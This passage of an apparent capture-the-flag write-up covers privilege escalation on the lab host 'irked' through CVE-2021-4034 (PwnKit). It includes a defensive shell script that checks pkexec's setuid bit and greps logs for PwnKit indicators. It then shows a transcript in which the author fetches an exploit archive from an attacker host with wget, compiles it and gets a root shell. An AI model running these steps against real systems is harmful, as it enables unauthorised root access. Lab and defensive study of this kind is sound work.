CVE-2021-4034


LinPEAS discovered that the target system is vulnerable to CVE-2021-4034. The vulnerable program, pkexec, is part of Polkit, which manages process privileges. Polkit lets non-privileged processes communicate with privileged ones, and pkexec instruments legitimate, authorized uses of privilege escalation in a way similar to sudo.

A memory corruption flaw is triggered when pkexec is executed with no arguments. By manipulating environment variables, an attacker can then trick pkexec into loading and executing arbitrary code with superuser privileges.
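Two defender-side checks for the flaw described above, written for this write-up as an added example (not code from the PwnKit exploit or from Polkit): whether pkexec is still setuid root, which is what the attack needs, and whether an auth log contains the two messages pkexec emits when it rejects the manipulated environment. The sample log lines are constructed, modelled on pkexec's syslog format, not captured from the target.

```shell
#!/bin/sh
# Added example: CVE-2021-4034 mitigation and detection checks.
# - pkexec_is_setuid: exit 0 if the setuid bit is set on the given binary.
#   Dropping it (chmod 0755 /usr/bin/pkexec) is the stop-gap when no patched
#   polkit package can be installed yet.
# - pwnkit_log_hits: print auth-log lines carrying the two messages pkexec logs
#   when its environment sanitisation rejects the injected variables. An exploit
#   can be tuned to avoid these, so no hits is not proof the host is clean.

pkexec_is_setuid() {
    bin="${1:-/usr/bin/pkexec}"
    [ -u "$bin" ]
}

pwnkit_log_hits() {
    grep -E 'pkexec.*(The value for the SHELL variable was not found the /etc/shells file|The value for environment variable .* contains suspicious content)' "$1"
}

count_pwnkit_log_hits() {
    pwnkit_log_hits "$1" | wc -l | tr -d ' '
}

# Constructed sample log (hostname and user taken from this write-up; the
# timestamps, PIDs and COMMAND fields are invented for the example).
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
Jan 24 15:01:02 irked pkexec[1234]: ircd: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 24 15:01:05 irked pkexec[1240]: ircd: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 24 15:02:00 irked sshd[1300]: Accepted publickey for ircd from 10.10.14.10 port 51000 ssh2
Jan 24 15:03:00 irked pkexec[1350]: ircd: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/ircd] [COMMAND=/usr/bin/systemctl status]
EOF

echo "PwnKit indicators in sample log: $(count_pwnkit_log_hits "$SAMPLE_LOG")"   # prints 2
if pkexec_is_setuid; then
    echo "/usr/bin/pkexec is still setuid root: patch polkit or drop the bit"
else
    echo "/usr/bin/pkexec is absent or not setuid"
fi
```

Run it against the real log with `pwnkit_log_hits /var/log/auth.log` (or `journalctl _COMM=pkexec`) once sourced; a legitimate pkexec run, like the last sample line, is not flagged.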

Exploit (PwnKit):


I found an exploit online.

Exploitation


ircd@irked:/dev/shm$ wget http://10.10.14.10:8000/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
--2023-01-24 15:00:20--  http://10.10.14.10:8000/CVE-2021-4034.tar.gz
Connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 40790 (40K) [application/gzip]
Saving to: ‘CVE-2021-4034.tar.gz’
 
CVE-2021-4034.tar.g 100%[=====================>]  39.83K  --.-KB/s   in 0.05s  
 
2023-01-24 15:00:20 (728 KB/s) - ‘CVE-2021-4034.tar.gz’ saved [40790/40790]

Delivery complete

ircd@irked:/dev/shm/CVE-2021-4034$ make
make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compiled

ircd@irked:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
irked
# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:3e:78  
          inet addr:10.10.10.117  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:3e78/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:3e78/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:200550 errors:0 dropped:119 overruns:0 frame:0
          TX packets:195783 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:32923605 (31.3 MiB)  TX bytes:65672065 (62.6 MiB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:229 errors:0 dropped:0 overruns:0 frame:0
          TX packets:229 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:20217 (19.7 KiB)  TX bytes:20217 (19.7 KiB)

System Level Compromise